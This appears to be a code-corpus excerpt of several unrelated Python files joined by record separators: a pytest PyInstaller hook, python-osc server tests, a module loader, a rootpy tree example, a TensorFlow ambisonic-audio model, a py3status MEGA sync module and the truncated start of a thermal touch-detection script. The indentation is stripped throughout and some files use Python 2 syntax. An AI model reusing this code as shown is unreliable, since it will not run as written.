# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
"""
Hook for http://pypi.python.org/pypi/pytest/
"""
import pytest
hiddenimports = pytest.freeze_includes()
|
py | 7df9ee8ed3a058393cbfa077dea9b57bc07615ac | import unittest
try:
import unittest.mock as mock
except ImportError:
import mock
from pythonosc import dispatcher
from pythonosc import osc_server
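# An OSC message is built from 4-byte-aligned chunks: a null-padded address
# pattern ("/SYNC"), a null-padded type-tag string (",i" = one int32 argument),
# followed by the big-endian argument bytes (here the value 4).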
_SIMPLE_PARAM_INT_MSG = (
b"/SYNC\x00\x00\x00"
b",i\x00\x00"
b"\x00\x00\x00\x04")
# Regression test for a datagram that should NOT be stripped, ever...
_SIMPLE_PARAM_INT_9 = b'/debug\x00\x00,i\x00\x00\x00\x00\x00\t'
_SIMPLE_MSG_NO_PARAMS = b"/SYNC\x00\x00\x00"
class TestOscServer(unittest.TestCase):
def test_is_valid_request(self):
self.assertTrue(
osc_server._is_valid_request([b'#bundle\x00foobar']))
self.assertTrue(
osc_server._is_valid_request([b'/address/1/2/3,foobar']))
self.assertFalse(
osc_server._is_valid_request([b'']))
class TestUDPHandler(unittest.TestCase):
def setUp(self):
super(TestUDPHandler, self).setUp()
self.dispatcher = dispatcher.Dispatcher()
# We do not want to create real UDP connections during unit tests.
self.server = mock.Mock(spec=osc_server.BlockingOSCUDPServer)
# Need to attach property mocks to types, not objects... weird.
type(self.server).dispatcher = mock.PropertyMock(
return_value=self.dispatcher)
self.client_address = ("127.0.0.1", 8080)
def test_no_match(self):
mock_meth = mock.MagicMock()
self.dispatcher.map("/foobar", mock_meth)
osc_server._UDPHandler(
[_SIMPLE_PARAM_INT_MSG, None], self.client_address, self.server)
self.assertFalse(mock_meth.called)
def test_match_with_args(self):
mock_meth = mock.MagicMock()
self.dispatcher.map("/SYNC", mock_meth, 1, 2, 3)
osc_server._UDPHandler(
[_SIMPLE_PARAM_INT_MSG, None], self.client_address, self.server)
mock_meth.assert_called_with("/SYNC", [1, 2, 3], 4)
def test_match_int9(self):
mock_meth = mock.MagicMock()
self.dispatcher.map("/debug", mock_meth)
osc_server._UDPHandler(
[_SIMPLE_PARAM_INT_9, None], self.client_address, self.server)
self.assertTrue(mock_meth.called)
mock_meth.assert_called_with("/debug", 9)
def test_match_without_args(self):
mock_meth = mock.MagicMock()
self.dispatcher.map("/SYNC", mock_meth)
osc_server._UDPHandler(
[_SIMPLE_MSG_NO_PARAMS, None], self.client_address, self.server)
mock_meth.assert_called_with("/SYNC")
def test_match_default_handler(self):
mock_meth = mock.MagicMock()
self.dispatcher.set_default_handler(mock_meth)
osc_server._UDPHandler(
[_SIMPLE_MSG_NO_PARAMS, None], self.client_address, self.server)
mock_meth.assert_called_with("/SYNC")
if __name__ == "__main__":
unittest.main()
|
py | 7df9efdd3a504edf5c07198256f201539aa0fefd | import logging
import sys
import importlib
from pathlib import Path
from typing import Union
from powerstrip.exceptions import ModuleException
from powerstrip.utils.utils import ensure_path
# prepare logger
log = logging.getLogger(__name__)
def load_module(module_name: str, path: Union[str, Path]):
"""
load module by name from given directory
:param module_name: name of the module
:type module_name: str
:param path: complete path of the python file
:type path: Union[str, Path]
:raises ModuleException: if file does not exist or module cannot be loaded
"""
assert isinstance(module_name, str)
assert isinstance(path, (str, Path))
# ensure that directory is a Path
path = ensure_path(path)
if not path.exists():
# not a path
raise ModuleException(
f"The file '{path}' does not exist! Abort."
)
# get modules spec
log.debug(
f"getting specs for module '{module_name}' in "
f"'{path.as_posix()}'..."
)
spec = importlib.util.spec_from_file_location(
name=module_name, location=path.as_posix()
)
if spec is None:
# spec not found
raise ModuleException(
f"Could not get specs for module '{module_name}' "
f"in file '{path}'! Abort."
)
if spec.name not in sys.modules:
# get module from spec, if not yet loaded
mod = importlib.util.module_from_spec(spec)
sys.modules[spec.name] = mod
# load the module
spec.loader.exec_module(mod)
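# Illustrative usage (a sketch; the plugin path below is hypothetical):
#   load_module("my_plugin", "/path/to/plugins/my_plugin.py")
#   plugin = sys.modules["my_plugin"]   # the loaded module is registered in sys.modules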
|
py | 7df9f22c66a3fb568d31e4114b914503bf86323a | from random import gauss
from rootpy.io import root_open
from rootpy.tree import Tree, TreeModel, FloatCol, IntCol
from rootpy.tree.model import TreeModelMeta
from rootpy import stl
from rootpy.vector import LorentzVector
from rootpy.tree.treetypes import FloatArrayCol
import tempfile
class Event(TreeModel):
# properties of particle "a"
a_x = FloatCol()
a_y = FloatCol()
a_z = FloatCol()
# properties of particle "b"
b_x = FloatCol()
b_y = FloatCol()
b_z = FloatCol()
# a collection of particles
col_x = stl.vector("float")
col_y = stl.vector("float")
col_z = stl.vector("float")
col_n = IntCol()
# a TLorentzVector
p = LorentzVector
i = IntCol()
# Make two files, each with a Tree called "test"
print "Creating test tree in chaintest1.root"
tmp_dir = tempfile.mkdtemp()
f = root_open(tmp_dir + "/chaintest1.root", "recreate")
branches = {
'x': FloatCol(),
'y': FloatCol(),
'z': FloatCol(),
'i': FloatCol(),
'vi': stl.vector('float'),
'vx': FloatArrayCol(4),
'vy': stl.vector('float'), }
# print branches
MyTreeModel = TreeModelMeta('MyTreeModel', (TreeModel,), branches)
tree = Tree("test", model=MyTreeModel)
# tree.create_branches(branches)
for i in xrange(10000):
tree.x = gauss(.5, 1.)
tree.y = gauss(.3, 2.)
tree.z = gauss(13., 42.)
tree.i = i
for vi in range(4):
tree.vi.push_back(vi**2)
tree.vy.push_back(vi**3)
tree.vx[vi] = vi**2
tree.fill(reset=True)
tree.write()
f.close()
# from random import randint
# tree = Tree("test", model=Event)
#
# # fill the tree
# for i in xrange(10):
# tree.a_x = gauss(.5, 1.)
# tree.a_y = gauss(.3, 2.)
# tree.a_z = gauss(13., 42.)
#
# tree.b_x = gauss(.5, 1.)
# tree.b_y = gauss(.3, 2.)
# tree.b_z = gauss(13., 42.)
#
# n = randint(1, 10)
# for j in xrange(n):
# tree.col_x.push_back(gauss(.5, 1.))
# tree.col_y.push_back(gauss(.3, 2.))
# tree.col_z.push_back(gauss(13., 42.))
# tree.col_n = n
#
# tree.p.SetPtEtaPhiM(gauss(.5, 1.),
# gauss(.5, 1.),
# gauss(.5, 1.),
# gauss(.5, 1.))
#
# tree.i = i
# tree.fill(reset=True)
# tree.write()
#
# f.close()
|
py | 7df9f276d27fb051fac868d590a5ca207393538c | import numpy as np
import tensorflow as tf
import pyutils.tflib.wrappers as tfw
from pyutils.tflib.models.image.resnet import ResNet18
from collections import OrderedDict
import myutils
from definitions import *
class SptAudioGenParams:
def __init__(self,
sep_num_tracks=NUM_SEP_TRACKS_DEF,
ctx_feats_fc_units=CTX_FEATS_FCUNITS_DEF,
loc_fc_units=LOC_FCUNITS_DEF,
sep_freq_mask_fc_units=SEP_FREQ_MASK_FCUNITS_DEF,
sep_fft_window=SEP_FFT_WINDOW_DEF):
self.sep_num_tracks = sep_num_tracks
self.ctx_feats_fc_units = ctx_feats_fc_units
self.loc_fc_units = loc_fc_units
self.sep_freq_mask_fc_units = sep_freq_mask_fc_units
self.sep_fft_window = sep_fft_window
class SptAudioGen(object):
def __init__(self, ambi_order,
audio_rate=48000,
video_rate=10,
context=1.,
sample_duration=0.1,
encoders=None,
separation='none',
params=SptAudioGenParams()):
assert float(audio_rate)/video_rate == int(audio_rate)/int(video_rate)
self.ambi_order = ambi_order
self.num_ambi_channels = sum([2*i+1 for i in range(ambi_order+1)])
self.snd_rate, self.vid_rate = audio_rate, video_rate
self.context, self.duration = context, sample_duration
self.snd_contx = int(context * audio_rate)
self.snd_dur = int(sample_duration * audio_rate)
self.snd_size = self.snd_contx + self.snd_dur - 1
assert self.snd_rate % self.vid_rate == 0
if encoders is None:
encoders = [AUDIO, VIDEO, FLOW]
assert isinstance(encoders, list)
assert all([e in ENCODERS for e in encoders])
self.encoders = encoders
self.separation = separation
self.params = params
self.model = None
self.deploy = None
self.solver = None
self.ends = OrderedDict()
self.init_ops = []
self.loc_channels = None
self.sep_channels = None
self.wind_size = int(self.params.sep_fft_window * self.snd_rate)
self.wind_size = int(2**np.round(np.log2(self.wind_size)))
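        # Round the separation STFT window length to the nearest power of two.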
@staticmethod
def _stft_mse_ops(gt, pred, window, overlap):
with tf.variable_scope('stft_diff'):
with tf.variable_scope('stft_gt'):
# stft_gt = myutils.stft(tf.transpose(gt, (0, 2, 1)), window, overlap)
stft_gt = myutils.stft_for_loss(gt, window, overlap)
with tf.variable_scope('stft_pred'):
# stft_pred = myutils.stft(tf.transpose(pred, (0, 2, 1)), window, overlap)
stft_pred = myutils.stft_for_loss(pred, window, overlap)
with tf.variable_scope('mse'):
stft_diff = tf.abs(stft_gt-stft_pred)
mse = tf.reduce_mean(tf.reduce_mean(stft_diff**2, axis=3), axis=2)
return mse
@staticmethod
def _lsd_ops(gt, pred, window, overlap):
EPS = 1e-2
with tf.variable_scope('lsd'):
with tf.variable_scope('stft_gt'):
stft_gt = myutils.stft(tf.transpose(gt, (0, 2, 1)), window, overlap)
with tf.variable_scope('stft_pred'):
stft_pred = myutils.stft(tf.transpose(pred, (0, 2, 1)), window, overlap)
with tf.variable_scope('lsd'):
def power_spect(x):
return 10 * tf.log(tf.abs(x)+EPS) / tf.log(10.)
log_spec_diff = (power_spect(stft_gt) - power_spect(stft_pred))
lsd_t = tf.sqrt(tf.reduce_mean(log_spec_diff**2, axis=3))
lsd = tf.reduce_mean(lsd_t, axis=2)
return lsd
@staticmethod
def _temporal_mse_ops(gt, pred):
with tf.variable_scope('mse'):
return tf.reduce_mean((gt - pred)**2, axis=1)
@staticmethod
def _temporal_snr_ops(gt, pred):
EPS = 1e-1
with tf.variable_scope('snr'):
Psignal = tf.reduce_sum(gt**2, axis=1)
Pnoise = tf.reduce_sum((gt-pred)**2, axis=1)
snr = 10. * tf.log((Psignal+EPS)/(Pnoise+EPS)) / tf.log(10.)
return snr
def evaluation_ops(self, preds_t, targets_t, w_t, mask_channels=None):
print('\n Metrics')
print(' * {:15s} | {:20s} | {:10s}'.format('Prediction', str(preds_t.get_shape()), str(preds_t.dtype)))
print(' * {:15s} | {:20s} | {:10s}'.format('Target', str(targets_t.get_shape()), str(targets_t.dtype)))
print(' * {:15s} | {:20s} | {:10s}'.format('Channel mask', str(mask_channels.get_shape()), str(mask_channels.dtype)))
if mask_channels is None:
batch_size, _, n_channels = preds_t.get_shape()
mask_channels = tf.ones((batch_size, n_channels))
num_masked = tf.reduce_sum(mask_channels, axis=0)
num_masked = tf.maximum(num_masked, 1)
metrics = OrderedDict()
window = int(FFT_WINDOW * self.snd_rate)
overlap = FFT_OVERLAP_R
stft_dist_ps = self._stft_mse_ops(targets_t, preds_t, window, overlap)
stft_dist = tf.reduce_sum(stft_dist_ps * mask_channels, axis=0) / num_masked * 100.
metrics['stft/avg'] = tf.reduce_mean(stft_dist)
for i, ch in zip(range(3), 'YZX'):
metrics['stft/'+ch] = stft_dist[i]
lsd_ps = self._lsd_ops(targets_t, preds_t, window, overlap)
lsd = tf.reduce_sum(lsd_ps * mask_channels, axis=0) / num_masked
metrics['lsd/avg'] = tf.reduce_mean(lsd)
for i, ch in zip(range(3), 'YZX'):
metrics['lsd/'+ch] = lsd[i]
mse_ps = self._temporal_mse_ops(targets_t, preds_t)
mse = tf.reduce_sum(mse_ps * mask_channels, axis=0) / num_masked * 5e3
metrics['mse/avg'] = tf.reduce_mean(mse)
for i, ch in zip(range(3), 'YZX'):
metrics['mse/'+ch] = mse[i]
snr_ps = self._temporal_snr_ops(targets_t, preds_t)
snr = tf.reduce_sum(snr_ps * mask_channels, axis=0) / num_masked
metrics['snr/avg'] = tf.reduce_mean(snr)
for i, ch in zip(range(3), 'YZX'):
metrics['snr/'+ch] = snr[i]
metrics['pow/pred'] = tf.reduce_sum(tf.reduce_mean(tf.reduce_mean(preds_t ** 2, axis=2), axis=0))
metrics['pow/gt'] = tf.reduce_sum(tf.reduce_mean(tf.reduce_mean(targets_t ** 2, axis=2), axis=0))
for m in metrics:
print(' * {:15s} | {:20s} | {:10s}'.format(m, str(metrics[m].get_shape()), str(metrics[m].dtype)))
return metrics, stft_dist_ps, lsd_ps, mse_ps, snr_ps
def loss_ops(self, metrics_t, step_t):
losses = OrderedDict()
losses['stft/mse'] = metrics_t['stft/avg']
return losses
def audio_encoder_ops(self, stft):
n_filters = [32, 64, 128, 256, 512]
filter_size = [(7, 16), (3, 7), (3, 5), (3, 5), (3, 5)]
stride = [(4, 8), (2, 4), (2, 2), (1, 1), (1, 1)]
inp_dim = 95. # Encoder Dim=1
ss = (self.snd_contx / 2.) * (4. / self.wind_size)
ss = int(ss - (inp_dim - 1) / 2.)
tt = (self.snd_contx / 2. + self.snd_dur) * (4. / self.wind_size)
tt = int(tt + (inp_dim - 1) / 2.)
tt = int((np.ceil((tt - ss - inp_dim) / 16.)) * 16 + inp_dim + ss)
sz = stft.get_shape().as_list()
stft = tf.transpose(stft[:, :, ss:tt, :], (0,2,3,1))
print(' * {:15s} | {:20s} | {:10s}'.format('Crop', str(stft.get_shape()), str(stft.dtype)))
x = tf.abs(stft)
print(' * {:15s} | {:20s} | {:10s}'.format('Magnitude', str(x.get_shape()), str(x.dtype)))
downsampling_l = [x]
for l, nf, fs, st in zip(range(len(n_filters)), n_filters, filter_size, stride):
name = 'conv{}'.format(l+1)
x = tfw.conv_2d(x, nf, fs, padding='VALID', activation_fn=tf.nn.relu, stride=st, name=name)
downsampling_l.append(x)
print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype)))
return downsampling_l
def visual_encoding_ops(self, inp, is_training=True, finetune=False, scope=None):
vid_units = 512
inp_shape = tuple(inp.get_shape().as_list())
print(' * {:15s} | {:20s} | {:10s}'.format('Input', str(inp.get_shape()), str(inp.dtype)))
x = tf.reshape(inp, shape=(inp_shape[0]*inp_shape[1],) + inp_shape[2:])
print(' * {:15s} | {:20s} | {:10s}'.format('Reshape', str(x.get_shape()), str(x.dtype)))
cnn = ResNet18()
x, ends = cnn.inference_ops(x, finetune, truncate_at='conv5_2')
init_ops = cnn.restore_pretrained(inp_shape[-1], scope)
self.init_ops.extend(init_ops)
self.ends.update([(scope+'/'+key, val) for key, val in ends.iteritems()])
return x
def bottleneck_ops(self, x_enc, use_audio=True):
if len(x_enc) == 0:
return None
bottleneck = []
audio_sz = x_enc[AUDIO][-1].get_shape().as_list()
for k in [AUDIO, VIDEO, FLOW]:
if k == AUDIO and not use_audio:
continue
if k in x_enc:
x = x_enc[k][-1] if k == AUDIO else x_enc[k]
print(' * {:15s} | {:20s} | {:10s}'.format(k+'-feats', str(x.get_shape()), str(x.dtype)))
if k != AUDIO:
name = k+'-fc-red'
x = tfw.fully_connected(x, 128, activation_fn=tf.nn.relu, name=name)
print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype)))
sz = x.get_shape().as_list()
out_shape = (sz[0], sz[1], sz[2]*sz[3]) if k == AUDIO else (sz[0], 1, sz[1]*sz[2]*sz[3])
x = tf.reshape(x, out_shape)
print(' * {:15s} | {:20s} | {:10s}'.format(k+'-reshape', str(x.get_shape()), str(x.dtype)))
name = k+'-fc'
n_units = 1024 if k == AUDIO else 512
x = tfw.fully_connected(x, n_units, activation_fn=tf.nn.relu, name=name)
print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype)))
if k in [VIDEO, FLOW]:
x = tf.tile(x, (1, audio_sz[1], 1))
print(' * {:15s} | {:20s} | {:10s}'.format(k+' tile', str(x.get_shape()), str(x.dtype)))
bottleneck.append(x)
bottleneck = tf.concat(bottleneck, 2)
print(' * {:15s} | {:20s} | {:10s}'.format('Concat', str(bottleneck.get_shape()), str(bottleneck.dtype)))
return bottleneck
def localization_ops(self, x):
num_out = (self.ambi_order + 1) ** 2 - self.ambi_order ** 2
num_in = self.ambi_order ** 2
# Localization
for i, u in enumerate(self.params.loc_fc_units):
name = 'fc{}'.format(i+1)
x = tfw.fully_connected(x, u, activation_fn=tf.nn.relu, name=name)
print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype)))
# Compute localization weights
name = 'fc{}'.format(len(self.params.loc_fc_units)+1)
x = tfw.fully_connected(
x, num_out*num_in*(self.params.sep_num_tracks+1), activation_fn=None,
weights_initializer=tf.truncated_normal_initializer(stddev=0.001),
weight_decay=0, name=name) # BS x NF x NIN x NOUT
sz = x.get_shape().as_list()
x = tf.reshape(x, (sz[0], sz[1], num_out, num_in, self.params.sep_num_tracks+1))
print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype)))
sz = x.get_shape().as_list()
x = tf.tile(tf.expand_dims(x, 2), (1, 1, self.snd_dur/sz[1], 1, 1, 1))
x = tf.reshape(x, (sz[0], self.snd_dur, sz[2], sz[3], sz[4]))
print(' * {:15s} | {:20s} | {:10s}'.format('Tile', str(x.get_shape()), str(x.dtype)))
weights = x[:, :, :, :, :-1]
print(' * {:15s} | {:20s} | {:10s}'.format('weights', str(weights.get_shape()), str(weights.dtype)))
biases = x[:, :, :, :, -1]
print(' * {:15s} | {:20s} | {:10s}'.format('biases', str(biases.get_shape()), str(biases.dtype)))
return weights, biases
def separation_ops(self, mono, stft, audio_enc, feats, scope='separation'):
if self.separation == NO_SEPARATION:
ss = self.snd_contx / 2
x_sep = mono[:, :, ss:ss + self.snd_dur] # BS x 1 x NF
x_sep = tf.expand_dims(x_sep, axis=1)
self.ends[scope + '/' + 'all_channels'] = x_sep
print(' * {:15s} | {:20s} | {:10s}'.format('Crop Audio', str(x_sep.get_shape()), str(x_sep.dtype)))
return x_sep
elif self.separation == FREQ_MASK:
n_filters = [32, 64, 128, 256, 512]
filter_size = [(7, 16), (3, 7), (3, 5), (3, 5), (3, 5)]
stride = [(4, 8), (2, 4), (2, 2), (1, 1), (1, 1)]
name = 'fc-feats'
feats = tfw.fully_connected(feats, n_filters[-1], activation_fn=tf.nn.relu, name=name)
print(' * {:15s} | {:20s} | {:10s}'.format(name, str(feats.get_shape()), str(feats.dtype)))
sz = feats.get_shape().as_list()
enc_sz = audio_enc[-1].get_shape().as_list()
feats = tf.tile(tf.expand_dims(feats, 2), (1, 1, enc_sz[2], 1))
feats = tf.reshape(feats, (sz[0], sz[1], enc_sz[2], sz[2]))
print(' * {:15s} | {:20s} | {:10s}'.format('Tile', str(feats.get_shape()), str(feats.dtype)))
x = tf.concat([audio_enc[-1], feats], axis=3)
print(' * {:15s} | {:20s} | {:10s}'.format('Concat', str(x.get_shape()), str(x.dtype)))
# Up-convolution
n_chann_in = mono.get_shape().as_list()[1]
for l, nf, fs, st, l_in in reversed(zip(range(len(n_filters)), [self.params.sep_num_tracks*n_chann_in,]+n_filters[:-1], filter_size, stride, audio_enc[:-1])):
name = 'deconv{}'.format(l+1)
x = tfw.deconv_2d(x, nf, fs, stride=st, padding='VALID', activation_fn=None, name=name)
print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype)))
if l == 0:
break
x = tf.concat((tf.nn.relu(x), l_in), 3)
print(' * {:15s} | {:20s} | {:10s}'.format('Concat', str(x.get_shape()), str(x.dtype)))
# Crop
ss = np.floor((self.snd_contx / 2. - self.wind_size) * (4. / self.wind_size))
tt = np.ceil((self.snd_contx / 2. + self.snd_dur + self.wind_size) * (4. / self.wind_size))
inp_dim = 95. # Encoder Dim=1
skip = (self.snd_contx / 2.) * (4. / self.wind_size)
skip = int(skip - (inp_dim - 1) / 2.)
stft = stft[:, :, int(ss):int(tt)]
print(' * {:15s} | {:20s} | {:10s}'.format('Crop STFT', str(stft.get_shape()), str(stft.dtype)))
x = x[:, int(ss-skip):int(tt-skip), :]
print(' * {:15s} | {:20s} | {:10s}'.format('Crop deconv1', str(x.get_shape()), str(x.dtype)))
x = tf.transpose(x, (0, 3, 1, 2))
print(' * {:15s} | {:20s} | {:10s}'.format('Permute', str(x.get_shape()), str(x.dtype)))
x_sz = x.get_shape().as_list()
x = tf.reshape(x, (x_sz[0], n_chann_in, -1, x_sz[2], x_sz[3]))
print(' * {:15s} | {:20s} | {:10s}'.format('Reshape', str(x.get_shape()), str(x.dtype)))
# Apply Mask
f_mask = tf.cast(tf.sigmoid(x), dtype=tf.complex64)
print(' * {:15s} | {:20s} | {:10s}'.format('Sigmoid', str(f_mask.get_shape()), str(f_mask.dtype)))
stft_sep = tf.expand_dims(stft, 2) * f_mask
print(' * {:15s} | {:20s} | {:10s}'.format('Prod', str(stft_sep.get_shape()), str(stft_sep.dtype)))
# IFFT
x_sep = myutils.istft(stft_sep, 4)
print(' * {:15s} | {:20s} | {:10s}'.format('ISTFT', str(x_sep.get_shape()), str(x_sep.dtype)))
ss = self.snd_contx / 2.
skip = np.floor((self.snd_contx / 2. - self.wind_size) * (4. / self.wind_size)) * (self.wind_size / 4.)
skip += 3. * self.wind_size / 4. # ISTFT ignores 3/4 of a window
x_sep = x_sep[:, :, :, int(ss-skip):int(ss-skip)+self.snd_dur]
print(' * {:15s} | {:20s} | {:10s}'.format('Crop', str(x_sep.get_shape()), str(x_sep.dtype)))
else:
raise ValueError('Unknown separation mode.')
self.ends[scope + '/' + 'all_channels'] = x_sep
return x_sep
def inference_ops(self, audio, video=None, flow=None, is_training=True):
audio = tf.transpose(audio, (0, 2, 1)) # BATCH_SIZE x N_CHANNELS x N_FRAMES
tensors = [audio, video, flow]
names = ['audio', 'video', 'flow']
print('Inputs')
for t, n in zip(tensors, names):
if t is not None:
self.ends[n] = t
print(' * {:15s} | {:20s} | {:10s}'.format(n, str(t.get_shape()), str(t.dtype)))
# STFT (0.025s windows, 25% hop)
print('\nSTFT')
stft = myutils.stft(audio, self.wind_size, 4)
print(' * {:15s} | {:20s} | {:10s}'.format('Mono', str(audio.get_shape()), str(audio.dtype)))
print(' * {:15s} | {:20s} | {:10s}'.format('STFT', str(stft.get_shape()), str(stft.dtype)))
x_enc = {}
# Audio encoder
if AUDIO in self.encoders:
print('\nAudio encoder')
scope = 'audio_encoder'
with tf.variable_scope(scope):
x_enc[AUDIO] = self.audio_encoder_ops(stft)
# Video encoder
if VIDEO in self.encoders:
print('\nVideo encoder')
scope = 'video_encoder'
with tf.variable_scope(scope):
x_enc[VIDEO] = self.visual_encoding_ops(
video, is_training=is_training, finetune=True, scope=scope)
# Flow encoder
if FLOW in self.encoders:
print('\nFlow encoder')
scope = 'flow_encoder'
with tf.variable_scope(scope):
x_enc[FLOW] = self.visual_encoding_ops(
flow, is_training=is_training, finetune=True, scope=scope)
# Mixer
print('\nBottleneck')
scope = 'bottleneck'
with tf.variable_scope(scope):
feats = self.bottleneck_ops(x_enc, AUDIO in self.encoders)
# Localization coefficients
scope = 'localization'
print('\n Localization')
with tf.variable_scope(scope):
weights, biases = self.localization_ops(feats)
self.loc_channels = [weights, biases]
# Source separation
scope = 'separation'
print('\n Separation')
with tf.variable_scope(scope):
x_sep = self.separation_ops(audio, stft, x_enc[AUDIO] if len(x_enc) else None, feats, scope)
self.sep_channels = x_sep
self.inp_spect = tf.abs(stft)
# Decode ambisonics
scope = 'decoder'
print('\n Ambix Generation')
x_sep = tf.transpose(x_sep, (0, 3, 1, 2))
print(' * {:15s} | {:20s} | {:10s}'.format('Input Audio', str(x_sep.get_shape()), str(x_sep.dtype)))
print(' * {:15s} | {:20s} | {:10s}'.format('Input Weights', str(weights.get_shape()), str(weights.dtype)))
print(' * {:15s} | {:20s} | {:10s}'.format('Input Biases', str(biases.get_shape()), str(biases.dtype)))
with tf.variable_scope(scope):
# Predict ambisonics (A_t = W_t*s_t + b_t)
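# (Reading of the line below, inferred from the printed shapes rather than stated in the
# original: the localization weights are broadcast against the separated sources, the product
# is summed over its last two axes, and biases[:, :, :, 0] is added, i.e. a per-time-step
# linear mapping from separated sources to ambisonic channels.)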
x_ambi = tf.reduce_sum(tf.reduce_sum(weights * tf.expand_dims(x_sep, axis=2), axis=4), axis=3) + biases[:,:,:,0]
self.ends[scope + '/ambix'] = x_ambi
print(' * {:15s} | {:20s} | {:10s}'.format('Ambix', str(x_ambi.get_shape()), str(x_ambi.dtype)))
return x_ambi
|
py | 7df9f2be5d3b9dfe578f73877ee22b7a69607991 | # -*- coding: utf-8 -*-
"""
Display status of MEGAcmd.
Configuration parameters:
cache_timeout: refresh interval for this module (default 10)
format: display format for the module (default "MEGA {format_sync}|No MEGA")
format_sync: display format for every sync (default "{syncstate}")
format_sync_separator: show separator if more than one sync (default " ")
Format placeholders:
{format_sync} Format for every sync returned by 'mega-sync' command.
format_sync placeholders:
Any column returned by 'mega-sync' command - in lower case!
For example: id, syncstate, localpath
Requires:
MEGAcmd: command-line interface for MEGA
@author Maxim Baz (https://github.com/maximbaz)
@license BSD
SAMPLE OUTPUT
{'full_text': 'MEGA Synced'}
"""
STRING_NOT_INSTALLED = "MEGAcmd is not installed"
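# Example py3status configuration for this module (an illustrative sketch only: the module name
# is assumed to follow the file name, and the available columns depend on your MEGAcmd version):
#
# mega_sync {
#     cache_timeout = 30
#     format = "MEGA {format_sync}|No MEGA"
#     format_sync = "{localpath}: {syncstate}"
#     format_sync_separator = ", "
# }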
class Py3status:
"""
"""
# available configuration parameters
cache_timeout = 10
format = "MEGA {format_sync}|No MEGA"
format_sync = "{syncstate}"
format_sync_separator = " "
def post_config_hook(self):
if not self.py3.check_commands("mega-sync"):
raise Exception(STRING_NOT_INSTALLED)
def mega_sync(self):
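# Illustrative 'mega-sync' output this parser assumes: a header row of column names followed
# by one row per configured sync (the exact columns vary between MEGAcmd versions), e.g.
#
#   ID  LOCALPATH            REMOTEPATH  SYNCSTATE
#   1   /home/user/MEGAsync  /           Synced
#
# The header is lower-cased and zipped with each row, so any column name can be used as a
# placeholder in format_sync.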
output = self.py3.command_output("mega-sync").splitlines()
format_sync = None
if len(output) > 0:
columns = output[0].lower().split()
megasync_data = []
for line in output[1:]:
cells = dict(zip(columns, line.split()))
megasync_data.append(self.py3.safe_format(self.format_sync, cells))
format_sync_separator = self.py3.safe_format(self.format_sync_separator)
format_sync = self.py3.composite_join(format_sync_separator, megasync_data)
return {
"cached_until": self.py3.time_in(self.cache_timeout),
"full_text": self.py3.safe_format(
self.format, {"format_sync": format_sync}
),
}
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status)
|
py | 7df9f3cf83c5f77142e54d48cef2e32e2f7d435b | #!/usr/bin/env python
#Copyright 2017 Martin Cooney
#This file is subject to the terms and conditions defined in file 'Readme.md', which is part of this source code package.
import numpy as np
import cv2
from subprocess import call
import sys
import math
#--------------------------------------------------------
# Setup
#--------------------------------------------------------
#Some default alignment parameters for the default dataset of touching objects:
#(please replace these with your own parameters if using different data)
shiftx = 38
shifty = 0
zoomFactorX = 0
zoomFactorY = 20
alpha = 0.7
shiftUp = 60
#Object parameters
#For the dataset the following five items were used:
#(please change if you use different data)
groundTruthObjects = [ ]
groundTruthLocations = [ ]
groundTruthObjects.append("PET bottle")
groundTruthObjects.append("ceramic cup")
groundTruthObjects.append("paper box")
groundTruthObjects.append("HDPE bottle")
groundTruthObjects.append("glass")
groundTruthLocations.append((227, 205))
groundTruthLocations.append((192, 207))
groundTruthLocations.append((153, 197))
groundTruthLocations.append((118, 182))
groundTruthLocations.append((77, 199))
#Detection parameters
PADDING_PARAMETER = 0.35 #used to remove part of the bounding boxes of detected objects, which often are rough and contain background along the perimeters
SD_THRESHOLD = 10 #used to detect if an object has varied temperature, which could be the result of a touch
INTENSITY_THRESHOLD = 20 #used to select the lighter (warmest) part within a bounding box
AREA_THRESHOLD = 10 #used to remove small dots of noise
APPROXIMATION_THRESHOLD = 0.03 #used for approximating the shape of touches to compute the surface to area ratio
SURFACE_AREA_THRESHOLD = 0.6 #used to remove long thin noise along the outlines of objects (from reflections or warm/cold backgrounds)
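#Worked example of the surface-to-area test (illustrative numbers, not taken from the dataset):
#a roughly circular touch of radius 5 px has area ~78 px^2 and perimeter ~31 px, giving a ratio
#of ~0.4 < SURFACE_AREA_THRESHOLD, so it is kept; a 1-px-wide streak with the same area has a
#perimeter of ~158 px and a ratio of ~2.0, so it is rejected as reflection/outline noise.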
#Other parameters
width = 320
height = 240
#get passed arguments and select filenames:
#please change these as needed to match where folders are on your system
basename = sys.argv[0]
beforeBaseName = sys.argv[1]
conditionName = sys.argv[2]
correctAnswer = int (sys.argv[3])
rgbFileName1 = "%s/%s_rgb.jpg" % (basename, beforeBaseName)
thermalFileName1 = "%s/%s_thermal_obj.jpg" % (basename, beforeBaseName)
thermalFileName2 = "%s/%s_thermal.jpg" % (basename, beforeBaseName)
shifted_RGB_filename = '../../data/objects/my_rgb_shifted.jpg'
objectDetectionResults_filename = '../../output/object_detection_results.txt'
darknetFolder = '../../../../darknet/'
outputLogFileName = '../../output/%s_resultsLogFile.dat' % conditionName
outputImageFilename = "../../data/objects/output/out_%s.jpg" % beforeBaseName
#read in images to process
image_rgb = cv2.imread(rgbFileName1)
image_rgb = cv2.resize(image_rgb, (width, height))
image_thermal = cv2.imread(thermalFileName1)
image_thermal = cv2.resize(image_thermal, (width, height))
#align mask and rgb for both before and after
shifted_rgb = image_rgb[shifty+zoomFactorY:240-zoomFactorY, 0+zoomFactorX:320-shiftx-zoomFactorX]
shifted_rgb = cv2.resize(shifted_rgb, (width, height))
shifted_thermal = image_thermal[0+shiftUp:240-shifty, shiftx:320]
shifted_thermal = cv2.resize(shifted_thermal, (width, height))
#to store predictions
touchedItems = [ ]
print ""
print "= Detect object touches in a single frame (MAY 2017) ="
print beforeBaseName
#--------------------------------------------------------
# Detect objects
#--------------------------------------------------------
#Call YOLO/Darknet
cv2.imwrite(shifted_RGB_filename, shifted_rgb)
